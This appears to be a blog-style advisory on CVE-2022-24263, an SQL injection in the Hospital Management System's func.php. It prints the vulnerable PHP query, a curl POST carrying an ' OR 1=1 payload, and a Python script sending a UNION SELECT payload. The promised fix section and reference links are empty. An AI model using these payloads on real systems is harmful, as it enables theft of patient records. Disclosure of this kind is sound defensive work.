The healthcare sector has been a juicy target for cyber attackers, and sometimes, the vulnerabilities are hiding in plain sight inside widely used software. One such threat, identified as CVE-2022-24263, was found in Hospital Management System (HMS) v4.—specifically within a file called func.php. This flaw allows attackers to perform SQL Injection using the email parameter. For hospitals and clinics relying on this free PHP-based system, the risks include unauthorized data access, leaked patient records, and worse.
Let's break down this vulnerability, how it can be attacked, and what developers and system admins need to know to keep their data safe.
What is CVE-2022-24263?
CVE-2022-24263 is a security vulnerability classified as SQL Injection in HMS v4.. The flaw is located in func.php, a PHP file handling backend functionalities. An attacker able to send crafted data to the system's email parameter can sneak malicious SQL code straight into the database, potentially exposing sensitive hospital and patient information.
A client (user, admin, attacker) sends data to the system, like a login or record-search request.
2. Inside /Hospital-Management-System-master/func.php, the code takes the user-supplied email and embeds it directly into an SQL query without any sanitization or validation.
Here's a simplified version of the vulnerable PHP code
// func.php
$email = $_POST['email'];
$result = mysqli_query($con, "SELECT * FROM users WHERE email = '$email'");
No escaping. No parameterization. The attacker is free to craft any SQL statement they wish.
A malicious actor could send a POST request like this
curl -X POST http://your-hospital-site.com/Hospital-Management-System-master/func.php \
-d "email=' OR 1=1-- "
This would change the query to
SELECT * FROM users WHERE email = '' OR 1=1-- '
Instead of matching a single email, it returns ALL user records, or further modified, lets the attacker bypass authentication, dump data, or even alter the database.
If the attacker is more ambitious, they could even union additional queries, extract password hashes, or modify patient data.
Below is a simple Python snippet that sends a malicious email parameter
import requests
target_url = "http://target-domain/Hospital-Management-System-master/func.php";
payload = "' UNION SELECT 1,2,3,4 -- "
data = {'email': payload}
r = requests.post(target_url, data=data)
print(r.text) # Sensitive data may be leaked here
Here’s how to clean this up
1. Use Prepared Statements / Parameterized Queries:
Original Disclosure:
Exploit Database PoC:
GitHub Source (HMS v4.):
Hospital-Management-System on GitHub
Conclusion
Hospital Management System v4. is used in many clinics due to its free, open nature—but this comes at a cost if you’re not careful. Unpatched installations are exposed and risky for both hospitals and patients. If you’re running this software, update or patch your code today, and ensure all user input is properly handled. Never let a trivial bug become the cause for a major data breach.
*If you found this article helpful, make sure to audit your hospital’s web applications for similar vulnerabilities!*
Timeline
Published on: 01/31/2022 22:15:00 UTC
Last modified on: 02/11/2022 18:01:00 UTC